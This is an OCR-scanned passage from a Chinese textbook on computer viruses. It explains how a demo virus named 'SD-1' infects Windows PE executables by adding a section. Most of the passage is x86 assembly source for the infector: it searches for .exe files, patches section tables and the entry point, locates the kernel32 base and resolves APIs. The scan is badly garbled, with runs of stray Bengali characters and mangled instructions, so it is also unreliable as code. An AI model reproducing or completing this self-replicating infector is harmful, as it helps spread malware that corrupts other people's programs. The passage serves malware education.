add eax.[esi].AddressOfFunctions :加 AddressOfFunctions 的 VA 
add eax, hModule : 别 忘 了 基地 址 
:从 地 址 表 得 到 导出 函数 地 址 
mov eax, [eax] ;得 到 函数 的 RVA 
add eax, hModule ; 别 忘 了 基地 址 
mov dwReturn, eax ;最 终 得 到 的 函数 的 线性 地 址 
Exit: 
mov eax, dwRetum ;函数 地 址 
Tet 
GetApiAddress endp 
end main 
显示 结果 如 图 3-3 所 示 。 
EEE এ! 


Kernel32.dll 基本 地 址 :77e60000 
LoadLibrary 地 址 :77e80221 
GetProcAddress 地 址 :77e80cab 


图 3-3 搜索 到 的 API 地 址 


3. 病毒 使 用 变量 
在 使 用 汇编 语言 进行 汇编 时 ， 若 寄存 器 不 够 用 ， 就 要 使 用 变量 。 病 毒 代码 侵入 到 可 执 
行文 件 中 的 位 置 对 于 不 同 的 可 执行 文件 是 不 同 的 。 在 下 面 的 代码 中 ， 病 毒 源 程序 中 有 
DWORD 类 型 变量 x, 编译 后 设 变量 的 偏 移 地 址 为 00401002h, 则 其 实际 表示 方式 为 mov eax, 
[00401002h]。 
.386 
.model flat stdcall 
option casemap :none  : case sensitive 


jmp (Qf :@f 表 示 下 一 个 标号 ， 指 @@ 
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x dd 1234h 


如 果 将 jmp 语句 开始 的 代码 ( 偏 移 为 00401000h) 附 加 到 如 图 3-4 所 示 的 两 段 程 序 后 面 ， 
设 程序 1 的 偏 移 为 100h， 程 序 2 的 偏 移 为 200h。 附 加 后 代码 反 汇编 ， 指 令 jmp 没有 问题 ， 
因为 它 的 机 器 码 为 EB04h，EB 是 jmp 指令 ，04 是 跨 距 。 复 制 到 新 位 置 后 jmp 后 面 的 eip 
ÆT, HL) jmp 后 面 的 跳 转 位 置 也 相应 地 变 了 。 变 量 x 的 偏 移 变 成 了 102h 和 202h， 但 后 
面 取 变 量 的 指令 也 应 该 相应 地 变 成 “mov eax,dword ptr[102h] ”和 “mov eax,dword ptr[202h] ”， 
若 仍 然 没 有 变 ， 肯 定 会 产生 错误 。 


程序 1 程序 2 
100h 
mp 106 
dd 12345678h 1200৮ [r5 হজ 
mov eax, dword ptr[00401002h] 13৮12517678, 
mov eax, dword ptr[00401002h] 


3-4 ”附加 代码 


现在 尝试 作 以 下 修改 : 
-386 
model flat, stdcall 
option casemap :none : case sensitive 


call @F :Q@f 表 示 下 最 近 的 一 个 标号 ， 指 QQ@ 


pop ebx 

sub ebx, offset @B 

jmp (Qf :@f 表示 最 近 的 下 一 个 标号 ， 指 @@ 
x dd 12345678h 

@@: 

mov eax, [ebx+x] 


反 汇 编 后 代码 : 
:00401000 80009009090 call 00401005 
:00401005 5B pop ebx 
:00401006 81EB05104000 sub ebx. 00401005 
:0040100C EB04 jmp 00401012 
:0040100E 3412 


:00401010 7856 
:00401012 8B830E104000 mov eax, dword ptr [ebx+0040100E] 
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从 这 段 代 码 看 到 ， 此 时 x 的 地 址 是 0040100Eh。call 00401005 执行 后 再 执行 pop ebx, 
ebx 等 于 00401005h， 执 行 sub ebx, 00401005 后 ，ebx 为 0。 那 么 最 后 得 到 的 bx 的 地 址 
ebx+0040100E 即 0040100Eh。 因 为 病毒 加 入 到 PE 文件 中 的 位 置 是 不 固定 的 ， 但 不 管 怎么 
变 ，ebx 也 跟着 变 ， 最 后 总 能 得 到 x 的 地 址 。 


3.2.2 ”病毒 修改 可 执行 文件 方法 


病毒 可 能 以 3 种 方式 对 PE 文件 进行 修改 ， 也 可 能 进行 压缩 或 加 密 。 修 改 的 3 种 方式 
分 别 为 添加 节 、 扩 展 节 和 插入 节 ， 下 面 分 别 介绍 各 种 方式 的 原理 ， 并 以 相应 的 代码 予以 
说 明 。 

1. 添加 节 方 式 修改 PE 

所 谓 添加 节 就 是 在 文件 的 最 后 建立 一 个 新 节 ， 同 时 在 节 表 结 构 的 后 面 建立 一 个 节 表 ， 
用 以 描述 该 节 。 程序 的 入 口 地 址 被 修改 为 指向 最 后 含有 病毒 代码 的 节 。 原 理 如 图 3-5 所 示 。 


DOS 头 AddressOfEntryPoint 
AddressOfEntryPoint 
PE X 
第 1 节 表 
= = 
第 ! 节 
第 n 节 


(病毒 的 ) 


图 3-5 添加 节 方式 


下 面 先 演示 一 个 程序 。 如 图 3-6 所 示 有 5 个 可 执行 文件 , 其 大 小 分 别 为 4&、20K、55K、 
1K, 16K 字 节 。 有 一 天 ， 该 目录 下 有 几 个 文件 感染 了 SD-1 号 病毒 ， 程 序 运 行 时 先 弹出 一 
个 信息 提示 对 话 框 ， 如 图 3-7 所 示 ， 再 运行 原来 的 程序 ， 同 时 发 现 病毒 在 同一 目录 下 修改 
了 一 个 文件 。 图 3-7 及 后 面 的 几 个 图 的 标题 上 有 设计 者 的 名 字 ， 为 避免 误解 已 删 掉 。 


| SE) MEE) SEV KEA IAD HR 
| SEE + > | BRR EI Ge | Q; x | EH- 


sk (D) [C oa 

XE x 修改 时 间 

c sm 天 | 加 soFRAMES.EXE 。 4KB 应 用 程序 “2004-11-19 8:42 

A 我 的 文档 sertexe] — 20KB 应 用 程序 2005-4-19 13:59 

cH 我 的 电脑 E|PEVrus.asm ^ SSKB ASM 文件 2005-6-18 10:55 
B gg 3.5 HE (A) EPEvius.exe 11KB 应 用 程序 ”2005-6-18 10:56 
B gg ZIXUN (C:) 器 xmuexe 16K8 应 用 程序 2005-4-18 21:39 
E esp) 


日 多 病毒 演示 _inew 


3-6 被 感染 前 
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该 程序 已 经 感染 了 5D-! 病 毒 
目录 下 EXE 文 件 
会 自动 感染 该 目录 下 一 个 文件 


图 3-7 感染 后 显示 的 信息 


再 观察 目录 下 文件 大 小 的 变化 ， 如 图 3-8 所 示 。 可 以 看 到 ,文件 Insert.exe 大 小 成 为 了 
24KB, Xmu.exe 成 为 了 18KB。 它们 的 字 节 数 增加 了 ， 其 他 两 个 可 执行 文件 大 小 没有 变化 ， 
运行 也 没有 感染 病毒 。 可 见 ， 该 种 病毒 感染 方式 修改 了 可 执行 文件 大 小 。 

| RE) SO SEV BRW IAD ME 


| EE - > - G| arr [anr Qe [Us 9: X a| Ed 
DEO) on 


cB seus jinsert exe — 248 应 用 程序 2005-8-1714:12 
Pe ISRA (AD (S]PEWrusasm — SSK8 ASM 文 件 2005-6-18 10:55 
ও zpuN (c) [Dieses — i160 应 用 程序 2005-6-18 10:56 
epp) _ [law ee 1513 应 用 程序 2005-8-17 14:13 


图 3-8 感染 后 的 文件 


运用 前 面 设计 的 PE 文件 分 析 工 具 ， 可 以 观察 其 结构 的 变化 。 以 Insert.exe 为 例 ， 感 染 
前 如 图 3-9 所 示 ， 感 染 后 如 图 3-10 所 示 。 

程序 大 小 为 0x6000 字 节 ， 比 感染 前 增加 了 0x1000 字 节 。 有 5 个 节 ， 比 原来 增加 了 1 
个 节 ， 增 加 的 节 名 为 第 五 个 节 ， 节 名 为 .SD-1。 入 口 地 址 RVA 为 0x55C1, 而 第 5 节 的 起 始 
RVA 为 0x5000， 占 用 空间 大 小 为 0x1000， 可 见 入 口 地 址 在 第 5 节 内 。 由 以 上 分 析 可 知 ， 
该 种 感染 方式 的 特点 是 : 

o 增加 一 个 新 节 ， 为 病毒 部 分 。 

e 程序 的 大 小 发 生变 化 。 

° 程序 的 入 口 地 址 发 生变 化 。 


图 3-9 感染 前 的 结构 分 析 
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可 以 看 到 ， 程 序 的 大 小 为 0x5000 字 节 ， 共 有 4 个 节 ， 节 名 分 别 为 .text、.rdata、.data 
和 .rsre。 程序 的 RVA 入 口 地 址 在 0x1730， 而 第 一 节 的 内 存 偏 移 地 址 RVA 为 0x1000, 占用 
0x1000 字 节 ， 内 。 再 从 如 图 3-10 所 示 来 分 析 感 染 后 的 Insert.exe。 


8772 d LER: 1084 
= TM P-10008 
=60000020 


p 
U 


pa ০ 
: Lo 


Hte rt menm 
Du. a 


Lr SpA MMT 
[d 
BERBER rn 

图 3-10 感染 后 的 结构 分 析 


现在 再 从 代码 角度 分 析 其 病毒 的 感染 原理 。 
(1) 病毒 寻找 exe 文件 


(üSearchFile2 proc 
:定义 局 部 变量 
LOCAL lpName[6]: BYTE :; 作 参数 ， 描 述 要 搜寻 的 文件 类 型 
LOCAL Qs: WIN32 FIND DATA :搜寻 文件 函数 需 使 用 的 结构 变量 
LOCAL handle: DWORD :存放 文件 句柄 
pushad :保护 所 有 寄存 器 ， 保 证 函数 调用 结束 后 寄存 器 不 变 
:初始 化 IpName， 使 其 内 容 为 “*.exe” 
mov al, * 
mov lpName. al 
mov al, '.' 
mov IpName+1. al 
mov al, 'e' 
mov IpName-2. al 
mov al, 'x' 
mov IpName-3. al 
mov al, 'e' 
mov lpName+4. al 
mov al, 0 
mov IpName-5. al 
:调用 FindFirstFile 函数 
invoke [ebx+ FindFirstFile], ADDR lpName. ADDR @st 
mov handle. eax 
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并 eax = INVALID HANDLE VALUE :失败 则 返回 
jmp Exito 

.endif 

mov esi, TRUE 

:循环 查找 exe 文件 

:文件 名 在 @st.cFileName 

.while esi— TRUE 
invoke [ebx+ FindNextFile], handle, ADDR @st 
mov esi, eax :找到 ， 则 FindNextFile 返回 TRUE， 否 则 返回 FALSE， 循 环 结束 
-break if esi = FALSE :车 返回 值 为 FALSE， 退 出 

;必须 ， 否 则 最 后 文件 被 找到 两 次 

invoke @ProcessPeFile3,ADDR @st.cFileName :调用 该 函数 感染 一 个 文件 


mov ecx, eax 
‘break .ifecx 一 -1 :感染 一 个 文件 以 后 退出 。 此 处 看 出 每 次 只 感染 一 个 文件 
.endw 
invoke [ebx+ FindClose] handle 。“ :搜寻 结束 
_Exit0: 
popad :恢复 所 有 寄存 器 
ret 
@SearchFile2 endp 


这 段 代 码 很 类 似 于 前 面 用 C++ 写 的 代码 。 

(2) 病毒 修改 exe 文件 

函数 @Align2 计算 按照 指定 值 对 齐 后 的 数值 。 程 序 中 的 节 是 需要 考虑 到 文件 对 齐 和 内 
存 对 齐 的 。 假 设 原来 文件 对 齐 粒度 SectionAlignment 为 0x1000， 病 毒 代码 长 为 0x1780， 则 
对 齐 后 长 为 0x2000。 通 过 执行 invoke @Align2, 1780h, 1000， 返 回 值 为 2000h。 


@Align2 proc dwSize, dwAlign 
push edx 
mov eax, dwSize 
Xor edx, edx 
div — dwAlign 
if edx 

inc eax 

„endif 
mul _dwAlign 
pop edx 
ret 

@Align2 endp 

函数 @ProcessPeFile3 完成 此 功能 ， 代 码 如 下 : 


;感染 文件 函数 ， 文 件 名 在 f Name 指向 的 缓冲 区 

@ProcessPeFile3 proc f Name 

:定义 局 部 变量 

local @hFile. @dwTemp. @dwEntry. @lpMemory. @OldEntry :分 别 用 作文 件 句柄 、 
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:临时 变量 、 入 口 地 址 、 内 存 指针 、 原 程序 入 口 地 址 
local fTemp0, @dwFileSize, pNewSec :分 别 用 作 临 时 变量 、 文 件 大 小 、 内 存 指 针 
local flags: DWORD :是 否 成 功 感染 的 标志 
pushad :保护 所 有 寄存 器 
mov flags, 0 :初始 化 ， 为 0 表示 没 感染 


কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 以 读 写 方式 打开 文件 f Name， 打 开 失败 则 退出 
d 
invoke [ebx+_ CreateFile]. f Name, GENERIC READ or GENERIC WRITE, N 
FILE SHARE READor FILE SHARE WRITE.NULL, OPEN EXISTING, V 
FILE ATTRIBUTE ARCHIVE, NULL 

mov (QhFile eax :得 到 文件 句柄 


if  eax— INVALID HANDLE VALUE 
jmp Exito :失败 ， 退 出 
endif 


কেফককককককককককককককককককককককককককককককককককককককককককককককককককককক কক কককককককক ক কক 


; 取 文件 长 度 ， 为 0 则 返回 


কেককককককককককককককককককককসকককককককককককককককককককককককককককককককককককককককককককককক 
invoke [ebx+_GetFileSize], @hFile, NULL 
mov (QdwFileSize.eax 


Af eax 一 0 
jmp Exil :文件 为 0， 无 法 感染 ， 退 出 
endif 


কেককক ফকসংক ক সংক. কক কংসক কক ফক কক কক ককক কক কক ক কক কক কক কক ক কক ক কক ক ক কক কক ক ক কক ক. কফ. কক কক কক ফস 


; 分 配 内 存 ， 得 到 内 存 指针 @lpMemory 


* সং সং ফং সং সং সং সং কং সং সও সং সং কং সং সং সং সং সং কং সং সং সং সং কং সং সং কং ক ক ক সং কং ক ক কং ক কং সং কং কং সং ক কং কং ক সং সক ফ সং ক সং সং ক কং কং ক সং ক. কং কং সং সং ক সং ক: সং সং ক 
invoke [ebx+ GlobalAlloc]. GPTR. @dwFileSize 
mov  @lpMemory, eax :内 存 指针 


df eax 一 0 :分 配 内 存 失败 . 退出 
jmp  Exitl 
endif 


কেককক ককফক কফ ক কক কক কক কক কক কক কক ক কক কক কককক কক কক ক কক ক কক কক কক কফ ক ক কক ক কক কক ক কক ক কক 


; 读 文件 到 内 存 @lpMemory， 长 度 为 @dwFileSize 


DER ক কফ কক ক কফ ক কস. কক ক ক ক ক কফ ক ক ক ক ক ক ক ক ক ক. ক কক ক ক ক ক ক + কক ক ক ক ক ক + ক. কক ক ক কফ কক ক কফ ক কফ ক কক ক 
invoke [ebx+ ReadFile], @hFile, @lpMemory. @dwFileSize, ADDR fTemp0. NULL 
কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
movesi, @lpMemory :内 存 指针 赋值 给 esi 
assume esi:ptr IMAGE DOS HEADER :esi 指向 DOS 头 
4f word ptr[esi]e magic!=5A4DH :判断 前 面 两 个 字 节 是 否 有 “MZ” 
jmp  Exit2 ;无 MZ 标志 ， 则 不 是 exe 文件 ， 返 回 
.endif 
moveax, [esil.e lfanew 
add eax， @lpMemory :eax 指 到 内 存 中 PE 头 开始 位 置 
assume esi: nothing :去 掉 esi 指针 特性 
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mov esi eax 
assume esiptr IMAGE NT HEADERS :esi 指 向 PE 头 
movzxeax, [esi].FileHeader.NumberOfSections 。“: 节 个 数 送 eax 
:movzx 不 同 于 mov， 因 [esi].FileHeader.NumberOfSections 为 16 位 ， 则 上 面 指令 相当 于 : 
XOT eax,eax 
¿mov ax.[esi]FileHeader.NumberOfSections 
dec eax ; 节 个 数 -1 了 》 eax 
mov ecx, sizeof IMAGE SECTION HEADER  : 节 表 字 节 数 了 ecx 
mul ecx eax*ecx 了 edx:eax，eax=( 节 个 数 -1)* 节 表 大 小 


mov edx. esi :edx=esi， 指 向 PE 头 开始 位 置 
add edx, sizeof IMAGE NT HEADERS :edx + PE 头 结构 大 小 


add edx, eax ;此 时 edx 指向 最 后 一 个 节 表 结构 开始 处 
mov ecx, edx 
add ecx, sizeof IMAGE SECTION HEADER :此 时 ecx 指向 最 后 一 个 节 表 
:结构 ， 病 毒 节 表 结构 从 此 处 开始 
;invoke [ebx+ MessageBox].0.addr @szNewFile.f Name.MB OK :测试 用 
:esi -> 指向 PE 头 
;ecx 定位 到 最 后 新 节 表 结构 开始 位 置 
:edx 定位 到 原来 文件 最 后 一 个 节 表 结 构 开始 位 置 
assume ecx:ptr IMAGE SECTION HEADER 
assume  edx: ptr IMAGE SECTION HEADER 
Jf word ptr[esi|Signature !- 4550H :检查 有 无 “PE” 标 志 ， 即 是 否 为 合格 PE 文件 
jmp Exit2 :无 “PE” 标 志 ， 返 回 
„endif 
: 判断 最 后 的 节 的 节 名 是 否 为 “.SD-1”， 是 说 明 感 染 过 了 ， 和 否则 不 感染 
lea eax, [edx] Namel :最 后 一 节 的 节 名 指针 -eax 
Af byte ptr [eax+1] = 'S' && byte ptr[eax+2] = 'D' && byte ptr[eax+3] = '-' && V 
byte ptr[eax+4] = '1" 


jmp Exit2 ; 最 后 的 节 名 不 是 “.SD-1”， 退 出 

endif 

:修改 PE 文件 头 

inc [esi].FileHeader.NumberOfSections : 节 个 数 加 1 

mov eax, [edx].PointerToRawData :最 后 节 基于 文件 的 偏 移 量 -->eax 
add eax. [edx].SizeOfRawData :最 后 节 占 用 长 度 +eax-->eax， 为 新 节 的 文件 偏 移 

mov [ecx].PointerToRawData, eax :得 到 病毒 节 的 文件 偏 移 

:计算 病毒 节 文件 对 齐 后 长 度 


mov eax, offset APPEND CODE END-offset APPEND CODE 
;offset APPEND_ CODE END fil offset APPEND CODE 分 别 为 病毒 要 加 入 到 
:exe 文件 中 代码 的 结束 地 址 和 起 使 地 址 
invoke 11802, eax, [esi] OptionalHeader.FileAlignment 
mov [ecx].SizeOfRawData, eax :文件 节 对 齐 后 节 长 度 赋值 病毒 节 表 
:计算 新 节 内 存 对 齐 后 长 度 
mov eax, offset APPEND CODE END-offset APPEND CODE 
invoke @Align?, eax, [esi].OptionalHeader.SectionAlignment 
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add [esi].OptionalHeader.SizeOfCode.eax :修正 代码 段 大 小 SizeOfCode 
add [esi].OptionalHeader.SizeOflmage. eax 
; 修正 内 存 中 整个 PE 映像 体 的 尺寸 SizeOfImage 
invoke (Align? [edx].Misc.VirtualSize [esi] OptionalHeader.SectionAlignment 
; 计算 新 节 的 内 存 偏 移 
add eax, [edx].VirtualAddress 


mov [ecx].VirtualAddress, eax :得 到 新 节 的 内 存 偏 移 
mov [ecx].Misc.VirtualSize, offset APPEND CODE END-offset APPEND CODE 
mov [ecx].Characteristics, IMAGE SCN CNT CODE or 


IMAGE SCN MEM EXECUTE or IMAGE SCN MEM READ or \ 
IMAGE SCN MEM WRITE :设置 新 节 的 属性 为 “代码 ”+“ 可 执行 ”+“ 可 读 ”+ 
“可 写 ”。 因 为 该 节 定义 了 变量 ， 需 读 写 ， 又 有 代码 

; 设置 病毒 的 节 名 为 “.SD-1”。 实 验 表 明 前 面 不 是 点 也 可 以 

lea eax, [ecx]Namel 

mov byteptr[eax]. '' 

mov byte ptr[eax+1], 'S' 

mov byte ptr[eax+2], 'D' 

mov byteptr[eax*3]. 4 

mov byte ptr[eax+4]， '1' 

mov byte ptr[eax+5], 0 
কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
; 修正 程序 入 口 指针 。 
; 此 处 函数 之 间 的 pushad.…popad: 不 能 去 掉 ， 因 为 所 包括 的 函数 会 破坏 指针 寄存 
; 器 ecx 的 内 容 。Ecx 用 作 结 构 的 指针 。 
EOHooeoipooeoeopoeoeooooeagopoopaapeeodopiopdopeipoedopnopobopnedoopepadapaoedoaeer 
mov eax, [ecx].VirtualAddress 
add eax, (offset NewEntry - offset APPEND CODE) 


:计算 新 入 口 地 址 的 虚拟 地 址 RVA 
push [esi].OptionalHeader.AddressOfEntryPoint ; 送 给 @dwEntry 

mov [esi].OptionalHeader.AddressOfEntryPoint, eax :设置 新 的 入 口 地 址 ， 是 RVA 
pop @dwEntry ;后 面 要 用 ， 先 入 栈 
pushad 


invoke [ebx+_GlobalAlloc], GPTR. [ecx].SizeOfRawData :分 配 病毒 节 大 小 的 内 存 

mov pNewSec, eax ;指针 到 pNewSec 

popad 

; 覆盖 原来 exe 文件 
; 分 别 写 入 文件 头 、 原 来 的 节 、 病 毒 节 结构 、 原 来 的 程序 代码 

; 写 入 的 大 小 为 原文 件 最 后 节 文件 偏 移 + 该 节 大 小 

; 写 入 时 没有 使 用 原文 件 长 度 ， 是 因为 文件 后 面 可 能 附加 有 其 他 字 节 ， 而 加 载 器 不 
; 做 检查 

mov eax, [edx].PointerToRawData 

add eax, [edx].SizeOfRawData 

mov edi eax 


: 写 入 原来 的 文件 。 
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pushad 

invoke [ebx+ SetFilePointer]. @hFile. 0. NULL, FILE BEGIN 
; 文件 指针 移动 到 文件 开始 

popad :恢复 ecx， 下 面 要 用 

pushad 

:新 写 入 的 内 容 其 头 文件 结构 已 经 变化 

invoke [ebx- WriteFile], @hFile. @IpMemory. edi. addr fTemp0. NULL 

popad WH ecx, FHAA 

: 写 入 病毒 节 长 度 的 数据 ， 为 数据 全 为 0 内 存 数 据 

pushad 

invoke [ebx+ WriteFile]. @hFile, pNewSec. [ecx].SizeOfRawData, addr V 
fTempo.NULL 

popad :恢复 ecx， 下 面 要 用 

pushad 

invoke [ebx+ SetFilePointer], @hFile.edi NULL. FILE BEGIN 

popad WH ecx, FHE 

:再 写 入 病毒 代码 

:为 什么 不 直接 写 入 病毒 代码 ? 考虑 病毒 节 也 需要 文件 对 齐 

pushad 

mov edi, offset APPEND CODE END-offset APPEND CODE  : 写 入 的 长 度 

mov eax, offset APPEND CODE 

addeax, ebx — ;必须 ， 因 为 到 了 被 感染 文件 中 offset APPEND CODE 已 经 不 是 
; 原来 的 值 。 

mov pNewSec. eax 

invoke [ebx+ WriteFile], @hFile, pNewSec, edi, addr fTemp0, NULL 

popad 

pushad 

invoke [ebx-- GlobalFree].pNewSec 

popad 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 修正 病毒 代码 中 的 Jmp oldEntry 指令 
হককিকিকিককফককিসককককককককফকককীনককককককককককীকসকককককককফকককককককককসককফকসীসকফকককক 
mov eax, [ecx].VirtualAddress :病毒 节 虚拟 地 址 ->eax 该 指令 的 eip 

: jmp ToOldEntry 的 下 条 指令 的 长 度 为 5S， 所 以 下 面 的 eax 为 

: (QdwEntry-eax 为 jmp XXXXX 中 的 XXXXXX ffi 

addeax. (offset ToOldEntry-offset APPEND CODE+5) 

sub@dwEntry, eax 

mov ecx, [ecx]PointerToRawData :最 后 一 节 文件 偏 移 -->ecx 

; ecx Jj. dwOldEntry 的 文件 偏 移 
add ecx, (offset_dwOldEntry — offset APPEND CODE) 


; pushad ;已 经 不 需要 保护 ecx 了， 而 ebx 不 会 变 
invoke [ebx+ SetFilePointer]. @hFile, ecx, NULL, FILE BEGIN 
; popad 


; pushad 
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invoke [ebx+ WriteFile], @hFile, addr @dwEntry, 4. addr @dwTemp, NULL 
; 写 入 _dwOldEntry 的 值 为 @dwEntry 
:popad 


কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 成 功 感染 ， 则 设置 flags 为 -1 


কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


mov flags, -1 

assume esi:nothing 
_Exit2: 

invoke [ebx+ GlobalFree]. @lpMemory :释放 内 存 
 Exitl: 

invoke [ebx+ CloseHandle]. (hFile ;释放 文件 句柄 
_Exit0: 

popad 

mov eax, flags 

ret 


@ProcessPeFile3 endp 

从 上 面 代码 可 以 看 到 添加 病毒 节 时 ， 病 毒 进行 了 如 下 工作 : 

৫) 分 析 exe 搜索 到 的 文件 是 否 为 正常 的 PE 文件 。 方 法 为 判断 DOS KAE “MZ” P 
志和 PE 头 有 无 “PE” 人 标志 。 

O 分 析 是 否 已 经 被 感染 过 了 。 读 文件 到 内 存 , 分 析 最 后 一 个 节 的 节 名 是 否 为 “SD-1”， 
是 则 认为 已 经 感染 过 了 ， 不 重复 感染 。 

@ 建立 病毒 节 表 结 构 ， 将 病毒 代码 写 入 到 被 感染 文件 最 后 。 节 表 结 构 中 需要 填 入 的 
参数 有 节 名 “SD-1”、 节 的 内 存 偏 移 地 址 VirtualAddress、 节 的 属性 Characteristics、 节 的 
文件 偏 移 PointerToRawData、 节 的 实际 大 小 VirtualSize。 

@ 修改 的 参数 有 PE 头 中 的 节 个 数 NumberOfSections、 代 码 段 大 小 SizeOfCode、 内 存 
中 整个 PE 映像 体 的 尺寸 SizeOfImage、 入 口 地 址 AddressOfEntryPoint。 


思考 : 
如 果 被 感染 文件 的 最 后 一 个 节 表 结构 和 第 一 个 节 之 间 的 间距 很 小 ， 不 足以 让 病毒 插入 


一 个 新 的 节 表 结构 ， 病 毒 还 能 感染 该 文件 么 ? 
再 来 看 看 病毒 代码 是 如 何 调用 这 两 个 函数 的 。 


:附加 代码 开始 位 置 

APPEND CODEequ $ : APPEND CODE 等 于 当前 位 置 的 偏 移 地 址 
hDIIKemel32 dd ? 

11011055320 ? 

hDllShell32 dd $ 

 GetProcAddress ApiGetProcAddress ? 

.LoadLibrary ^ ApiLoadLibrary ? 

 MessageBox ” ApiMessageBox # 

szLoadLibrary db 'LoadLibraryA'.0 
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szGetProcAddress db 'GetProcAddress'.0 
szUser32 db "user32'0 
SZKemel32 db — 'kernel32 dll'.0 
szMessageBox db — 'MessageBoxA'.0 
szCaption db “' 升 达 经 贸 管理 学 院 资讯 系 .0 
szTextl db "该 程序 已 经 感染 了 SD-1 病毒 .0dh.0ah 
db "病毒 程序 演示 ".0dh.0ah 
db "只 感染 本 目录 下 EXE 文件 ".0dh.0ah 
db "感染 后 提示 该 信息 框 ".0dh.0ah 
db "每 次 运行 时 会 自动 感染 该 目录 下 一 个 文件 ".0 
D>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
; 公用 模块 _GetKemel.asm 
; 根据 程序 被 调用 的 时 候 堆 栈 中 有 个 用 于 Ret 的 地 址 指向 Kemel32.dll 
; 而 从 内 存 中 扫描 并 获取 Kemel32.dll 的 基 址 
D>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
:>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
; 错误 Handler 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
_SEHHandler proc lpExceptionRecord, IpSEH, IpContext, lpDispatcherContext 
pushad 
mov esi, IpExceptionRecord 
mov edi, IpContext 
assume esi: pr EXCEPTION RECORD. edi: ptr CONTEXT 
mov eax, IpSEH 
push [eax + Och] 
pop  [edi].regEbp 
push [eax+8] 
pop [edi] regEip 
push eax 
pop [edi].regEsp 
assume — esinothing.edi:nothing 
popad 
mov eax, ExceptionContinueExecution 
ret 
 SEHHandler endp 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
: 在 内 存 中 扫描 Kemel32.dll 的 基 址 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
 GetKemelBase proc dwKernelRet 
local @dwRetum 
pushad 
mov (üdwRetum, 0 


কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক কক 


: 重 定位 
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কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
call @F 

@@: 

pop ebx :函数 调用 中 的 ebx 从 此 处 得 到 

sub ebx.offset @B 


কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 创建 用 于 错误 处 理 的 SEH 结构 
sed 
assume fsnothing 

push ebp 

lea eax, [ebx + offset PageError] 

push eax 

lea eax, [ebx + offset SEHHandler] 

push eax 

push fs:[0] 

mov fs:[0], esp 


কেককককককক কক ককককককককককককক কককককক কক কককককককককককক ককককককক কক কককক কক কক কক 


; 查找 Kemel32.dll 的 基地 址 
কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov edi, dwKemelRet 
and edi, Offff0000h 
while TRUE 
if word ptr[edi] — IMAGE DOS SIGNATURE 
mov esi, edi 
add esi, [esi+003ch] 
if word ptr [esi] 一 IMAGE NT SIGNATURE 
mov (@dwRetum. edi 
‘break 
endif 
endif 
. PageError: 
sub edi, 010000h 
‘break „if edi < 070000000h 


-endw 

pop fs[0] 

add esp. Och 
popad 

mov eax, @dwRetum 
ret 


_GetKemelBase endp 
:৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯ 
; 从 内 存 中 模块 的 导出 表 中 获取 某 个 API 的 入 口 地 址 

:_hModule 是 由 _GetKemelBase 函数 得 到 的 Kernel32.dll 基 址 

:_lpszApi 是 函数 的 字符 串 名 
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:১৯৯৯৯৯৯৯৯৯১৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯১৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯১৯৯৯৯৯৯৯৯৯৯৯ 


_GetApi proc  hModule, _IpszApi 
local @dwRetum, QdwStringLength 
pushad 


mov (QdwRetum, 0 


- কককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 


; 重 定位 

- ককককফকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
call @F 

pop ebx 

sub ebx, offset @B 


- ককককককককককককককককককককককককফককককককককককককককককককককককককককককককককক ক কককক কক 


; 创建 用 于 错误 处 理 的 SEH 结构 


২ ফকককককককককককককককককককককককফককককককককককককককককককককককককককককককককক কফ কককক কক 


assume fs:nothing 

push ebp 

lea eax, [ebx + offset. Error] 

push eax 

lea eax, [ebx + offset SEHHandler] 
push eax 

push fs:[0] 

mov fs:[0], esp 


১ কক কক ক ককসংক কংসক ক কক কক ক কক কক কক EEEE কককক কক কক কককক ক কক ক কক ক কক কক ককংক. ক. কক কক ক কস ক ক 


; 计算 API 字符 串 的 长 度 ( 带 尾部 的 0) 


১ সফফসফসকফসফফকফসফফসফসফসফফকফসফফকফসকসসফসফফসফসসফসফসফফফফসফসসফসকফসফসফসং 


mov edi, _IpszApi 
mov ecx, -l 
xor al, al 

cld 

repnz scasb 


mov ecx, edi 


sub ecx, _lpszApi 
mov @dwStringLength, ecx 


কেফফক কক কক কক ক ক কক ক কককক কক+কক ক কক ক ককককক কক ক কক কক ক কক ক কক কক ককক কক ক কক ক কক কক ক কক ক কক 


: 从 PE 文件 头 的 数据 目录 获取 导出 表 地 址 


কেকফফককককক কক ক কক ক কককক ককককক কক ক ককককক কক ক কককক ক কক ক কক কক কককক কক কক ক কক কক ক কক ক কক 


mov esi, _hModule 

add esi, [esi+ 3ch] 

assume  esiptr IMAGE NT HEADERS 

mov esi, [esi].OptionalHeader.DataDirectory.VirtualAddress 
add esi, _hModule 

assume esiptr IMAGE EXPORT DIRECTORY 


